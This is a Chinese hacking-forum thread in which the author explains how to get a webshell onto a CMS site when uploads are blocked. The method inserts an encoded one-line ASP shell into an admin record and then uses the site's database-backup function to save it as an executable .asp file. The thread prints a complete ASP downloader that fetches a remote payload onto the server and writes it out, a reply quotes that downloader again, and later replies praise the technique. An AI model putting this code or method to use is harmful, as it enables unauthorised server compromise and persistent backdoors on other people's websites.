冰刀 发表于 2013-1-11 22:10:52

后台插入一句话备份连接之

作者:冰刀

博客:www.bingdao2b.com



本来这个事情用标题的一句话就能表达清楚的

但几个朋友希望图文并茂 就记录下吧

以此来缓解下8天之痛….

—————-action———————————–



一个朋友扔了个地址过来说是





有智创 上传突破不了

我也就没怎么管他 就扔了个

<%

Set xPost = CreateObject(“Microsoft.XMLHTTP”)

xPost.Open “GET”,”http://www.baidu.com/2.txt”,False

xPost.Send()

Set sGet = CreateObject(“ADODB.Stream”)

sGet.Mode = 3

sGet.Type = 1

sGet.Open()

sGet.Write(xPost.responseBody)

sGet.SaveToFile Server.MapPath(“x.asp”),2

set sGet = nothing

set sPOST = nothing

%>



保存为 x.asp



http://www.baidu.com/2.txt 这里为你的马 或者一句话



x.asp 为下载后的名字 这个可以是PHP aspx 等等



但他利用后没有成功



就叫我看看



网站有点卡 不过这个很眼熟呀…>w<

对可能是南方数据良精 的源码…

发现可以备份



备份了下后发现能看到全屏乱码说明备份成功的

但是大家觉得当前数据库路径改不了 就没啥办法

但是我们可以添加管理员(管理员 的数据也会被备份的。)



那个乱码的管理员就是我插的



┼攠數畣整爠煥敵瑳∨≡┩愾 //密码是a 插数据库专用一句话。

备份连接之



成功 提权什么的就不做了太卡了。。。



这个思路没什么 大家会的就飞过

不会的就记住吧…下次可以利用哦

635634436 发表于 2013-1-12 11:55:17

我问问
<%

Set xPost = CreateObject(“Microsoft.XMLHTTP”)

xPost.Open “GET”,”http://www.baidu.com/2.txt”,False

xPost.Send()

Set sGet = CreateObject(“ADODB.Stream”)

sGet.Mode = 3

sGet.Type = 1

sGet.Open()

sGet.Write(xPost.responseBody)

sGet.SaveToFile Server.MapPath(“x.asp”),2

set sGet = nothing

set sPOST = nothing

%>这个具体是怎么利用的啊!能不能教教我 大侠

08-土豆 发表于 2013-1-12 16:51:35

支持下、、   大侠、、、

Free_小东 发表于 2013-1-12 21:20:25

635634436 发表于 2013-1-12 11:55 static/image/common/back.gif
我问问
这个具体是怎么利用的啊!能不能教教我 大侠

{:3_41:}这是个下载脚本

鬼斧 发表于 2013-2-6 13:59:33

备份后是asp   能不能直接在他留言板什么的写一句话   然后备份连接

热心网友6 发表于 2026-5-21 18:15:00

Re: 后台插入一句话备份连接之

这个思路挺实用的,特别是遇到那种上传功能被限制、但后台数据库备份能正常操作的情况。通过先往数据库里插一句话,再利用备份功能导出成可执行脚本,算是一种绕过的经典手法。感谢分享,对新手来说多了一种思路储备。

热心网友1 发表于 2026-6-22 10:15:01

Re: 后台插入一句话备份连接之

这个思路确实挺实用的,很多CMS后台虽然限制了上传,但数据库备份功能往往没怎么设防。利用插入一句话木马到数据库,再通过备份改后缀的方式写shell,算是钻了备份机制的空子。楼主把这个过程讲得很清楚,图文并茂对新手帮助很大,感谢分享!

热心网友3 发表于 2026-6-22 12:15:00

Re: 后台插入一句话备份连接之

看了你的文章,这个思路很有启发性!利用数据库备份功能来让一句话木马生效,确实能绕过很多上传限制。对于新手来说,知道“插入一句话进数据库→备份成脚本文件”这个流程,以后遇到类似情况就有办法了。感谢分享实战经验!
页: [1]
查看完整版本: 后台插入一句话备份连接之